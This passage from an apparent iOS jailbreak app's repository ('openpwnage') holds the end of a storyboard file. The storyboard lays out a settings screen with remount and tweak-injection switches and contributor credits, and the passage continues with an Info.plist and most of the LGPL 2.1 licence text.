101 |                         <viewControllerLayoutGuide type="top" id="WRC-cY-Rug"/>
102 |                         <viewControllerLayoutGuide type="bottom" id="g2Y-1i-bkg"/>
103 |                     </layoutGuides>
104 |                     <view key="view" contentMode="scaleToFill" id="bpJ-qb-LtJ">
105 |                         <rect key="frame" x="0.0" y="0.0" width="414" height="842"/>
106 |                         <autoresizingMask key="autoresizingMask" widthSizable="YES" heightSizable="YES"/>
107 |                         <subviews>
108 |                             <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" fixedFrame="YES" text="Settings" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" minimumScaleFactor="0.69999999999999996" adjustsFontForContentSizeCategory="YES" translatesAutoresizingMaskIntoConstraints="NO" id="d7P-pf-3yo">
109 |                                 <rect key="frame" x="154" y="88" width="107" height="36"/>
110 |                                 <autoresizingMask key="autoresizingMask" flexibleMinX="YES" flexibleMaxX="YES" flexibleMinY="YES" flexibleMaxY="YES"/>
111 |                                 <fontDescription key="fontDescription" type="system" pointSize="30"/>
112 |                                 <nil key="textColor"/>
113 |                                 <nil key="highlightedColor"/>
114 |                             </label>
115 |                             <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" fixedFrame="YES" text="Only mess with if you know what you're doing." textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" minimumScaleFactor="0.69999999999999996" adjustsFontForContentSizeCategory="YES" translatesAutoresizingMaskIntoConstraints="NO" id="ASw-O9-5Sa">
116 |                                 <rect key="frame" x="67" y="167" width="280" height="16"/>
117 |                                 <autoresizingMask key="autoresizingMask" flexibleMinX="YES" flexibleMaxX="YES" flexibleMinY="YES" flexibleMaxY="YES"/>
118 |                                 <fontDescription key="fontDescription" type="system" pointSize="13"/>
119 |                                 <nil key="textColor"/>
120 |                                 <nil key="highlightedColor"/>
121 |                             </label>
122 |                             <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" fixedFrame="YES" text="openpwnage build 7" textAlignment="center" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" minimumScaleFactor="0.69999999999999996" adjustsFontForContentSizeCategory="YES" translatesAutoresizingMaskIntoConstraints="NO" id="jPW-kr-XY1">
123 |                                 <rect key="frame" x="20" y="646" width="374" height="16"/>
124 |                                 <autoresizingMask key="autoresizingMask" flexibleMinX="YES" flexibleMaxX="YES" flexibleMinY="YES" flexibleMaxY="YES"/>
125 |                                 <fontDescription key="fontDescription" type="system" pointSize="13"/>
126 |                                 <nil key="textColor"/>
127 |                                 <nil key="highlightedColor"/>
128 |                             </label>
129 |                             <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" fixedFrame="YES" text="full credits:" textAlignment="center" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" minimumScaleFactor="0.69999998807907104" adjustsFontForContentSizeCategory="YES" translatesAutoresizingMaskIntoConstraints="NO" id="NYC-pf-eg9">
130 |                                 <rect key="frame" x="20" y="670" width="374" height="16"/>
131 |                                 <autoresizingMask key="autoresizingMask" flexibleMinX="YES" flexibleMaxX="YES" flexibleMinY="YES" flexibleMaxY="YES"/>
132 |                                 <fontDescription key="fontDescription" type="system" pointSize="13"/>
133 |                                 <nil key="textColor"/>
134 |                                 <nil key="highlightedColor"/>
135 |                             </label>
136 |                             <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" fixedFrame="YES" text="zachary7829" textAlignment="center" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" minimumScaleFactor="0.69999998807907104" adjustsFontForContentSizeCategory="YES" translatesAutoresizingMaskIntoConstraints="NO" id="eVy-S7-QAY">
137 |                                 <rect key="frame" x="20" y="694" width="374" height="16"/>
138 |                                 <autoresizingMask key="autoresizingMask" flexibleMinX="YES" flexibleMaxX="YES" flexibleMinY="YES" flexibleMaxY="YES"/>
139 |                                 <fontDescription key="fontDescription" type="system" pointSize="13"/>
140 |                                 <nil key="textColor"/>
141 |                                 <nil key="highlightedColor"/>
142 |                             </label>
143 |                             <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" fixedFrame="YES" text="spv (remount / part of patchfinder)" textAlignment="center" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" minimumScaleFactor="0.69999998807907104" adjustsFontForContentSizeCategory="YES" translatesAutoresizingMaskIntoConstraints="NO" id="AWh-X0-XqE">
144 |                                 <rect key="frame" x="20" y="718" width="374" height="16"/>
145 |                                 <autoresizingMask key="autoresizingMask" flexibleMinX="YES" flexibleMaxX="YES" flexibleMinY="YES" flexibleMaxY="YES"/>
146 |                                 <fontDescription key="fontDescription" type="system" pointSize="13"/>
147 |                                 <nil key="textColor"/>
148 |                                 <nil key="highlightedColor"/>
149 |                             </label>
150 |                             <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" fixedFrame="YES" text="jk? (kpmap patch)" textAlignment="center" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" minimumScaleFactor="0.69999998807907104" adjustsFontForContentSizeCategory="YES" translatesAutoresizingMaskIntoConstraints="NO" id="krX-hR-eHY">
151 |                                 <rect key="frame" x="20" y="742" width="374" height="16"/>
152 |                                 <autoresizingMask key="autoresizingMask" flexibleMinX="YES" flexibleMaxX="YES" flexibleMinY="YES" flexibleMaxY="YES"/>
153 |                                 <fontDescription key="fontDescription" type="system" pointSize="13"/>
154 |                                 <nil key="textColor"/>
155 |                                 <nil key="highlightedColor"/>
156 |                             </label>
157 |                             <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" fixedFrame="YES" text="saurik (Telesphoreo bootstrap)" textAlignment="center" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" minimumScaleFactor="0.69999998807907104" adjustsFontForContentSizeCategory="YES" translatesAutoresizingMaskIntoConstraints="NO" id="eqQ-qk-pw3">
158 |                                 <rect key="frame" x="20" y="766" width="374" height="16"/>
159 |                                 <autoresizingMask key="autoresizingMask" flexibleMinX="YES" flexibleMaxX="YES" flexibleMinY="YES" flexibleMaxY="YES"/>
160 |                                 <fontDescription key="fontDescription" type="system" pointSize="13"/>
161 |                                 <nil key="textColor"/>
162 |                                 <nil key="highlightedColor"/>
163 |                             </label>
164 |                             <switch opaque="NO" contentMode="scaleToFill" horizontalHuggingPriority="750" verticalHuggingPriority="750" fixedFrame="YES" contentHorizontalAlignment="center" contentVerticalAlignment="center" on="YES" translatesAutoresizingMaskIntoConstraints="NO" id="sSc-k4-4jg">
165 |                                 <rect key="frame" x="57" y="249" width="49" height="31"/>
166 |                                 <autoresizingMask key="autoresizingMask" flexibleMinX="YES" flexibleMaxX="YES" flexibleMinY="YES" flexibleMaxY="YES"/>
167 |                                 <connections>
168 |                                     <action selector="remountFSSwitch:" destination="Crh-S9-hOh" eventType="valueChanged" id="Ao9-kl-ODo"/>
169 |                                 </connections>
170 |                             </switch>
171 |                             <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" fixedFrame="YES" text="Remount File System" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" minimumScaleFactor="0.69999999999999996" adjustsFontForContentSizeCategory="YES" translatesAutoresizingMaskIntoConstraints="NO" id="jWh-1l-Fun">
172 |                                 <rect key="frame" x="198" y="254" width="160" height="21"/>
173 |                                 <autoresizingMask key="autoresizingMask" flexibleMinX="YES" flexibleMaxX="YES" flexibleMinY="YES" flexibleMaxY="YES"/>
174 |                                 <fontDescription key="fontDescription" type="system" pointSize="17"/>
175 |                                 <nil key="textColor"/>
176 |                                 <nil key="highlightedColor"/>
177 |                             </label>
178 |                             <switch opaque="NO" contentMode="scaleToFill" horizontalHuggingPriority="750" verticalHuggingPriority="750" fixedFrame="YES" contentHorizontalAlignment="center" contentVerticalAlignment="center" on="YES" translatesAutoresizingMaskIntoConstraints="NO" id="T0M-LS-ZuX">
179 |                                 <rect key="frame" x="57" y="315" width="49" height="31"/>
180 |                                 <autoresizingMask key="autoresizingMask" flexibleMinX="YES" flexibleMaxX="YES" flexibleMinY="YES" flexibleMaxY="YES"/>
181 |                                 <connections>
182 |                                     <action selector="TweakInjectionSwitch:" destination="Crh-S9-hOh" eventType="valueChanged" id="SnH-FD-DkW"/>
183 |                                 </connections>
184 |                             </switch>
185 |                             <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" fixedFrame="YES" text="Tweak Injection" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" minimumScaleFactor="0.69999999999999996" adjustsFontForContentSizeCategory="YES" translatesAutoresizingMaskIntoConstraints="NO" id="K9m-hs-90c">
186 |                                 <rect key="frame" x="198" y="320" width="118" height="21"/>
187 |                                 <autoresizingMask key="autoresizingMask" flexibleMinX="YES" flexibleMaxX="YES" flexibleMinY="YES" flexibleMaxY="YES"/>
188 |                                 <fontDescription key="fontDescription" type="system" pointSize="17"/>
189 |                                 <nil key="textColor"/>
190 |                                 <nil key="highlightedColor"/>
191 |                             </label>
192 |                             <button opaque="NO" contentMode="scaleToFill" fixedFrame="YES" contentHorizontalAlignment="center" contentVerticalAlignment="center" buttonType="system" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="NhF-oM-10f">
193 |                                 <rect key="frame" x="178" y="406" width="59" height="31"/>
194 |                                 <autoresizingMask key="autoresizingMask" flexibleMinX="YES" flexibleMaxX="YES" flexibleMinY="YES" flexibleMaxY="YES"/>
195 |                                 <color key="backgroundColor" systemColor="systemBlueColor"/>
196 |                                 <color key="tintColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
197 |                                 <state key="normal" title="Button"/>
198 |                                 <buttonConfiguration key="configuration" style="plain" title="Done"/>
199 |                                 <connections>
200 |                                     <segue destination="BYZ-38-t0r" kind="show" id="HnN-Zc-OQt"/>
201 |                                 </connections>
202 |                             </button>
203 |                             <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" fixedFrame="YES" text="dora2-ios (part of patchfinder)" textAlignment="center" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" minimumScaleFactor="0.69999998807907104" adjustsFontForContentSizeCategory="YES" translatesAutoresizingMaskIntoConstraints="NO" id="UK5-ye-mPT">
204 |                                 <rect key="frame" x="20" y="784" width="374" height="16"/>
205 |                                 <autoresizingMask key="autoresizingMask" flexibleMinX="YES" flexibleMaxX="YES" flexibleMinY="YES" flexibleMaxY="YES"/>
206 |                                 <fontDescription key="fontDescription" type="system" pointSize="13"/>
207 |                                 <nil key="textColor"/>
208 |                                 <nil key="highlightedColor"/>
209 |                             </label>
210 |                         </subviews>
211 |                         <color key="backgroundColor" systemColor="systemBackgroundColor"/>
212 |                     </view>
213 |                 </viewController>
214 |                 <placeholder placeholderIdentifier="IBFirstResponder" id="fO7-sT-gai" userLabel="First Responder" customClass="UIResponder" sceneMemberID="firstResponder"/>
215 |             </objects>
216 |             <point key="canvasLocation" x="1453.6231884057972" y="8.7053571428571423"/>
217 |         </scene>
218 |     </scenes>
219 |     <resources>
220 |         <image name="openpwnageB7JailbreakButtonopenpwnageB7JailbreakButton" width="306" height="64"/>
221 |         <systemColor name="labelColor">
222 |             <color white="0.0" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
223 |         </systemColor>
224 |         <systemColor name="systemBackgroundColor">
225 |             <color white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
226 |         </systemColor>
227 |         <systemColor name="systemBlueColor">
228 |             <color red="0.0" green="0.47843137254901963" blue="1" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
229 |         </systemColor>
230 |         <systemColor name="systemGray4Color">
231 |             <color red="0.81960784313725488" green="0.81960784313725488" blue="0.83921568627450982" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
232 |         </systemColor>
233 |     </resources>
234 | </document>
235 | 


--------------------------------------------------------------------------------
/openpwnage/Info.plist:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
 3 | <plist version="1.0">
 4 | <dict>
 5 | 	<key>UIApplicationSceneManifest</key>
 6 | 	<dict>
 7 | 		<key>UIApplicationSupportsMultipleScenes</key>
 8 | 		<false/>
 9 | 		<key>UISceneConfigurations</key>
10 | 		<dict>
11 | 			<key>UIWindowSceneSessionRoleApplication</key>
12 | 			<array>
13 | 				<dict>
14 | 					<key>UISceneConfigurationName</key>
15 | 					<string>Default Configuration</string>
16 | 					<key>UISceneDelegateClassName</key>
17 | 					<string>SceneDelegate</string>
18 | 					<key>UISceneStoryboardFile</key>
19 | 					<string>Main</string>
20 | 				</dict>
21 | 			</array>
22 | 		</dict>
23 | 	</dict>
24 | 	<key>UIFileSharingEnabled</key>
25 | 	<true/>
26 | </dict>
27 | </plist>
28 | 


--------------------------------------------------------------------------------
/openpwnage/LGPL/LICENSE:
--------------------------------------------------------------------------------
  1 |                   GNU LESSER GENERAL PUBLIC LICENSE
  2 |                        Version 2.1, February 1999
  3 | 
  4 |  Copyright (C) 1991, 1999 Free Software Foundation, Inc.
  5 |  51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
  6 |  Everyone is permitted to copy and distribute verbatim copies
  7 |  of this license document, but changing it is not allowed.
  8 | 
  9 | [This is the first released version of the Lesser GPL.  It also counts
 10 |  as the successor of the GNU Library Public License, version 2, hence
 11 |  the version number 2.1.]
 12 | 
 13 |                             Preamble
 14 | 
 15 |   The licenses for most software are designed to take away your
 16 | freedom to share and change it.  By contrast, the GNU General Public
 17 | Licenses are intended to guarantee your freedom to share and change
 18 | free software--to make sure the software is free for all its users.
 19 | 
 20 |   This license, the Lesser General Public License, applies to some
 21 | specially designated software packages--typically libraries--of the
 22 | Free Software Foundation and other authors who decide to use it.  You
 23 | can use it too, but we suggest you first think carefully about whether
 24 | this license or the ordinary General Public License is the better
 25 | strategy to use in any particular case, based on the explanations below.
 26 | 
 27 |   When we speak of free software, we are referring to freedom of use,
 28 | not price.  Our General Public Licenses are designed to make sure that
 29 | you have the freedom to distribute copies of free software (and charge
 30 | for this service if you wish); that you receive source code or can get
 31 | it if you want it; that you can change the software and use pieces of
 32 | it in new free programs; and that you are informed that you can do
 33 | these things.
 34 | 
 35 |   To protect your rights, we need to make restrictions that forbid
 36 | distributors to deny you these rights or to ask you to surrender these
 37 | rights.  These restrictions translate to certain responsibilities for
 38 | you if you distribute copies of the library or if you modify it.
 39 | 
 40 |   For example, if you distribute copies of the library, whether gratis
 41 | or for a fee, you must give the recipients all the rights that we gave
 42 | you.  You must make sure that they, too, receive or can get the source
 43 | code.  If you link other code with the library, you must provide
 44 | complete object files to the recipients, so that they can relink them
 45 | with the library after making changes to the library and recompiling
 46 | it.  And you must show them these terms so they know their rights.
 47 | 
 48 |   We protect your rights with a two-step method: (1) we copyright the
 49 | library, and (2) we offer you this license, which gives you legal
 50 | permission to copy, distribute and/or modify the library.
 51 | 
 52 |   To protect each distributor, we want to make it very clear that
 53 | there is no warranty for the free library.  Also, if the library is
 54 | modified by someone else and passed on, the recipients should know
 55 | that what they have is not the original version, so that the original
 56 | author's reputation will not be affected by problems that might be
 57 | introduced by others.
 58 | 
 59 |   Finally, software patents pose a constant threat to the existence of
 60 | any free program.  We wish to make sure that a company cannot
 61 | effectively restrict the users of a free program by obtaining a
 62 | restrictive license from a patent holder.  Therefore, we insist that
 63 | any patent license obtained for a version of the library must be
 64 | consistent with the full freedom of use specified in this license.
 65 | 
 66 |   Most GNU software, including some libraries, is covered by the
 67 | ordinary GNU General Public License.  This license, the GNU Lesser
 68 | General Public License, applies to certain designated libraries, and
 69 | is quite different from the ordinary General Public License.  We use
 70 | this license for certain libraries in order to permit linking those
 71 | libraries into non-free programs.
 72 | 
 73 |   When a program is linked with a library, whether statically or using
 74 | a shared library, the combination of the two is legally speaking a
 75 | combined work, a derivative of the original library.  The ordinary
 76 | General Public License therefore permits such linking only if the
 77 | entire combination fits its criteria of freedom.  The Lesser General
 78 | Public License permits more lax criteria for linking other code with
 79 | the library.
 80 | 
 81 |   We call this license the "Lesser" General Public License because it
 82 | does Less to protect the user's freedom than the ordinary General
 83 | Public License.  It also provides other free software developers Less
 84 | of an advantage over competing non-free programs.  These disadvantages
 85 | are the reason we use the ordinary General Public License for many
 86 | libraries.  However, the Lesser license provides advantages in certain
 87 | special circumstances.
 88 | 
 89 |   For example, on rare occasions, there may be a special need to
 90 | encourage the widest possible use of a certain library, so that it becomes
 91 | a de-facto standard.  To achieve this, non-free programs must be
 92 | allowed to use the library.  A more frequent case is that a free
 93 | library does the same job as widely used non-free libraries.  In this
 94 | case, there is little to gain by limiting the free library to free
 95 | software only, so we use the Lesser General Public License.
 96 | 
 97 |   In other cases, permission to use a particular library in non-free
 98 | programs enables a greater number of people to use a large body of
 99 | free software.  For example, permission to use the GNU C Library in
100 | non-free programs enables many more people to use the whole GNU
101 | operating system, as well as its variant, the GNU/Linux operating
102 | system.
103 | 
104 |   Although the Lesser General Public License is Less protective of the
105 | users' freedom, it does ensure that the user of a program that is
106 | linked with the Library has the freedom and the wherewithal to run
107 | that program using a modified version of the Library.
108 | 
109 |   The precise terms and conditions for copying, distribution and
110 | modification follow.  Pay close attention to the difference between a
111 | "work based on the library" and a "work that uses the library".  The
112 | former contains code derived from the library, whereas the latter must
113 | be combined with the library in order to run.
114 | 
115 |                   GNU LESSER GENERAL PUBLIC LICENSE
116 |    TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
117 | 
118 |   0. This License Agreement applies to any software library or other
119 | program which contains a notice placed by the copyright holder or
120 | other authorized party saying it may be distributed under the terms of
121 | this Lesser General Public License (also called "this License").
122 | Each licensee is addressed as "you".
123 | 
124 |   A "library" means a collection of software functions and/or data
125 | prepared so as to be conveniently linked with application programs
126 | (which use some of those functions and data) to form executables.
127 | 
128 |   The "Library", below, refers to any such software library or work
129 | which has been distributed under these terms.  A "work based on the
130 | Library" means either the Library or any derivative work under
131 | copyright law: that is to say, a work containing the Library or a
132 | portion of it, either verbatim or with modifications and/or translated
133 | straightforwardly into another language.  (Hereinafter, translation is
134 | included without limitation in the term "modification".)
135 | 
136 |   "Source code" for a work means the preferred form of the work for
137 | making modifications to it.  For a library, complete source code means
138 | all the source code for all modules it contains, plus any associated
139 | interface definition files, plus the scripts used to control compilation
140 | and installation of the library.
141 | 
142 |   Activities other than copying, distribution and modification are not
143 | covered by this License; they are outside its scope.  The act of
144 | running a program using the Library is not restricted, and output from
145 | such a program is covered only if its contents constitute a work based
146 | on the Library (independent of the use of the Library in a tool for
147 | writing it).  Whether that is true depends on what the Library does
148 | and what the program that uses the Library does.
149 | 
150 |   1. You may copy and distribute verbatim copies of the Library's
151 | complete source code as you receive it, in any medium, provided that
152 | you conspicuously and appropriately publish on each copy an
153 | appropriate copyright notice and disclaimer of warranty; keep intact
154 | all the notices that refer to this License and to the absence of any
155 | warranty; and distribute a copy of this License along with the
156 | Library.
157 | 
158 |   You may charge a fee for the physical act of transferring a copy,
159 | and you may at your option offer warranty protection in exchange for a
160 | fee.
161 | 
162 |   2. You may modify your copy or copies of the Library or any portion
163 | of it, thus forming a work based on the Library, and copy and
164 | distribute such modifications or work under the terms of Section 1
165 | above, provided that you also meet all of these conditions:
166 | 
167 |     a) The modified work must itself be a software library.
168 | 
169 |     b) You must cause the files modified to carry prominent notices
170 |     stating that you changed the files and the date of any change.
171 | 
172 |     c) You must cause the whole of the work to be licensed at no
173 |     charge to all third parties under the terms of this License.
174 | 
175 |     d) If a facility in the modified Library refers to a function or a
176 |     table of data to be supplied by an application program that uses
177 |     the facility, other than as an argument passed when the facility
178 |     is invoked, then you must make a good faith effort to ensure that,
179 |     in the event an application does not supply such function or
180 |     table, the facility still operates, and performs whatever part of
181 |     its purpose remains meaningful.
182 | 
183 |     (For example, a function in a library to compute square roots has
184 |     a purpose that is entirely well-defined independent of the
185 |     application.  Therefore, Subsection 2d requires that any
186 |     application-supplied function or table used by this function must
187 |     be optional: if the application does not supply it, the square
188 |     root function must still compute square roots.)
189 | 
190 | These requirements apply to the modified work as a whole.  If
191 | identifiable sections of that work are not derived from the Library,
192 | and can be reasonably considered independent and separate works in
193 | themselves, then this License, and its terms, do not apply to those
194 | sections when you distribute them as separate works.  But when you
195 | distribute the same sections as part of a whole which is a work based
196 | on the Library, the distribution of the whole must be on the terms of
197 | this License, whose permissions for other licensees extend to the
198 | entire whole, and thus to each and every part regardless of who wrote
199 | it.
200 | 
201 | Thus, it is not the intent of this section to claim rights or contest
202 | your rights to work written entirely by you; rather, the intent is to
203 | exercise the right to control the distribution of derivative or
204 | collective works based on the Library.
205 | 
206 | In addition, mere aggregation of another work not based on the Library
207 | with the Library (or with a work based on the Library) on a volume of
208 | a storage or distribution medium does not bring the other work under
209 | the scope of this License.
210 | 
211 |   3. You may opt to apply the terms of the ordinary GNU General Public
212 | License instead of this License to a given copy of the Library.  To do
213 | this, you must alter all the notices that refer to this License, so
214 | that they refer to the ordinary GNU General Public License, version 2,
215 | instead of to this License.  (If a newer version than version 2 of the
216 | ordinary GNU General Public License has appeared, then you can specify
217 | that version instead if you wish.)  Do not make any other change in
218 | these notices.
219 | 
220 |   Once this change is made in a given copy, it is irreversible for
221 | that copy, so the ordinary GNU General Public License applies to all
222 | subsequent copies and derivative works made from that copy.
223 | 
224 |   This option is useful when you wish to copy part of the code of
225 | the Library into a program that is not a library.
226 | 
227 |   4. You may copy and distribute the Library (or a portion or
228 | derivative of it, under Section 2) in object code or executable form
229 | under the terms of Sections 1 and 2 above provided that you accompany
230 | it with the complete corresponding machine-readable source code, which
231 | must be distributed under the terms of Sections 1 and 2 above on a
232 | medium customarily used for software interchange.
233 | 
234 |   If distribution of object code is made by offering access to copy
235 | from a designated place, then offering equivalent access to copy the
236 | source code from the same place satisfies the requirement to
237 | distribute the source code, even though third parties are not
238 | compelled to copy the source along with the object code.
239 | 
240 |   5. A program that contains no derivative of any portion of the
241 | Library, but is designed to work with the Library by being compiled or
242 | linked with it, is called a "work that uses the Library".  Such a
243 | work, in isolation, is not a derivative work of the Library, and
244 | therefore falls outside the scope of this License.
245 | 
246 |   However, linking a "work that uses the Library" with the Library
247 | creates an executable that is a derivative of the Library (because it
248 | contains portions of the Library), rather than a "work that uses the
249 | library".  The executable is therefore covered by this License.
250 | Section 6 states terms for distribution of such executables.
251 | 
252 |   When a "work that uses the Library" uses material from a header file
253 | that is part of the Library, the object code for the work may be a
254 | derivative work of the Library even though the source code is not.
255 | Whether this is true is especially significant if the work can be
256 | linked without the Library, or if the work is itself a library.  The
257 | threshold for this to be true is not precisely defined by law.
258 | 
259 |   If such an object file uses only numerical parameters, data
260 | structure layouts and accessors, and small macros and small inline
261 | functions (ten lines or less in length), then the use of the object
262 | file is unrestricted, regardless of whether it is legally a derivative
263 | work.  (Executables containing this object code plus portions of the
264 | Library will still fall under Section 6.)
265 | 
266 |   Otherwise, if the work is a derivative of the Library, you may
267 | distribute the object code for the work under the terms of Section 6.
268 | Any executables containing that work also fall under Section 6,
269 | whether or not they are linked directly with the Library itself.
270 | 
271 |   6. As an exception to the Sections above, you may also combine or
272 | link a "work that uses the Library" with the Library to produce a
273 | work containing portions of the Library, and distribute that work
274 | under terms of your choice, provided that the terms permit
275 | modification of the work for the customer's own use and reverse
276 | engineering for debugging such modifications.
277 | 
278 |   You must give prominent notice with each copy of the work that the
279 | Library is used in it and that the Library and its use are covered by
280 | this License.  You must supply a copy of this License.  If the work
281 | during execution displays copyright notices, you must include the
282 | copyright notice for the Library among them, as well as a reference
283 | directing the user to the copy of this License.  Also, you must do one
284 | of these things:
285 | 
286 |     a) Accompany the work with the complete corresponding
287 |     machine-readable source code for the Library including whatever
288 |     changes were used in the work (which must be distributed under
289 |     Sections 1 and 2 above); and, if the work is an executable linked
290 |     with the Library, with the complete machine-readable "work that
291 |     uses the Library", as object code and/or source code, so that the
292 |     user can modify the Library and then relink to produce a modified
293 |     executable containing the modified Library.  (It is understood
294 |     that the user who changes the contents of definitions files in the
295 |     Library will not necessarily be able to recompile the application
296 |     to use the modified definitions.)
297 | 
298 |     b) Use a suitable shared library mechanism for linking with the
299 |     Library.  A suitable mechanism is one that (1) uses at run time a
300 |     copy of the library already present on the user's computer system,
301 |     rather than copying library functions into the executable, and (2)
302 |     will operate properly with a modified version of the library, if
303 |     the user installs one, as long as the modified version is
304 |     interface-compatible with the version that the work was made with.
305 | 
306 |     c) Accompany the work with a written offer, valid for at
307 |     least three years, to give the same user the materials
308 |     specified in Subsection 6a, above, for a charge no more
309 |     than the cost of performing this distribution.
310 | 
311 |     d) If distribution of the work is made by offering access to copy
312 |     from a designated place, offer equivalent access to copy the above
313 |     specified materials from the same place.
314 | 
315 |     e) Verify that the user has already received a copy of these
316 |     materials or that you have already sent this user a copy.
317 | 
318 |   For an executable, the required form of the "work that uses the
319 | Library" must include any data and utility programs needed for
320 | reproducing the executable from it.  However, as a special exception,
321 | the materials to be distributed need not include anything that is
322 | normally distributed (in either source or binary form) with the major
323 | components (compiler, kernel, and so on) of the operating system on
324 | which the executable runs, unless that component itself accompanies
325 | the executable.
326 | 
327 |   It may happen that this requirement contradicts the license
328 | restrictions of other proprietary libraries that do not normally
329 | accompany the operating system.  Such a contradiction means you cannot
330 | use both them and the Library together in an executable that you
331 | distribute.
332 | 
333 |   7. You may place library facilities that are a work based on the
334 | Library side-by-side in a single library together with other library
335 | facilities not covered by this License, and distribute such a combined
336 | library, provided that the separate distribution of the work based on
337 | the Library and of the other library facilities is otherwise
338 | permitted, and provided that you do these two things:
339 | 
340 |     a) Accompany the combined library with a copy of the same work
341 |     based on the Library, uncombined with any other library
342 |     facilities.  This must be distributed under the terms of the
343 |     Sections above.
344 | 
345 |     b) Give prominent notice with the combined library of the fact
346 |     that part of it is a work based on the Library, and explaining
347 |     where to find the accompanying uncombined form of the same work.
348 | 
349 |   8. You may not copy, modify, sublicense, link with, or distribute
350 | the Library except as expressly provided under this License.  Any
351 | attempt otherwise to copy, modify, sublicense, link with, or
352 | distribute the Library is void, and will automatically terminate your
353 | rights under this License.  However, parties who have received copies,
354 | or rights, from you under this License will not have their licenses
355 | terminated so long as such parties remain in full compliance.
356 | 
357 |   9. You are not required to accept this License, since you have not
358 | signed it.  However, nothing else grants you permission to modify or
359 | distribute the Library or its derivative works.  These actions are
360 | prohibited by law if you do not accept this License.  Therefore, by
361 | modifying or distributing the Library (or any work based on the
362 | Library), you indicate your acceptance of this License to do so, and
363 | all its terms and conditions for copying, distributing or modifying
364 | the Library or works based on it.
365 | 
366 |   10. Each time you redistribute the Library (or any work based on the
367 | Library), the recipient automatically receives a license from the
368 | original licensor to copy, distribute, link with or modify the Library
369 | subject to these terms and conditions.  You may not impose any further
370 | restrictions on the recipients' exercise of the rights granted herein.
371 | You are not responsible for enforcing compliance by third parties with
372 | this License.
373 | 
374 |   11. If, as a consequence of a court judgment or allegation of patent
375 | infringement or for any other reason (not limited to patent issues),
376 | conditions are imposed on you (whether by court order, agreement or
377 | otherwise) that contradict the conditions of this License, they do not
378 | excuse you from the conditions of this License.  If you cannot
379 | distribute so as to satisfy simultaneously your obligations under this
380 | License and any other pertinent obligations, then as a consequence you
381 | may not distribute the Library at all.  For example, if a patent
382 | license would not permit royalty-free redistribution of the Library by
383 | all those who receive copies directly or indirectly through you, then
384 | the only way you could satisfy both it and this License would be to
385 | refrain entirely from distribution of the Library.
386 | 
387 | If any portion of this section is held invalid or unenforceable under any
388 | particular circumstance, the balance of the section is intended to apply,
389 | and the section as a whole is intended to apply in other circumstances.
390 | 
391 | It is not the purpose of this section to induce you to infringe any
392 | patents or other property right claims or to contest validity of any
393 | such claims; this section has the sole purpose of protecting the
394 | integrity of the free software distribution system which is
395 | implemented by public license practices.  Many people have made
396 | generous contributions to the wide range of software distributed
397 | through that system in reliance on consistent application of that
398 | system; it is up to the author/donor to decide if he or she is willing
399 | to distribute software through any other system and a licensee cannot
400 | impose that choice.
401 | 
402 | This section is intended to make thoroughly clear what is believed to
403 | be a consequence of the rest of this License.
404 | 
405 |   12. If the distribution and/or use of the Library is restricted in
406 | certain countries either by patents or by copyrighted interfaces, the
407 | original copyright holder who places the Library under this License may add
408 | an explicit geographical distribution limitation excluding those countries,
409 | so that distribution is permitted only in or among countries not thus
410 | excluded.  In such case, this License incorporates the limitation as if
411 | written in the body of this License.
412 | 
413 |   13. The Free Software Foundation may publish revised and/or new
414 | versions of the Lesser General Public License from time to time.
415 | Such new versions will be similar in spirit to the present version,
416 | but may differ in detail to address new problems or concerns.
417 | 
418 | Each version is given a distinguishing version number.  If the Library
419 | specifies a version number of this License which applies to it and
420 | "any later version", you have the option of following the terms and
421 | conditions either of that version or of any later version published by
422 | the Free Software Foundation.  If the Library does not specify a
423 | license version number, you may choose any version ever published by
424 | the Free Software Foundation.
425 | 
426 |   14. If you wish to incorporate parts of the Library into other free
427 | programs whose distribution conditions are incompatible with these,
428 | write to the author to ask for permission.  For software which is
429 | copyrighted by the Free Software Foundation, write to the Free
430 | Software Foundation; we sometimes make exceptions for this.  Our
431 | decision will be guided by the two goals of preserving the free status
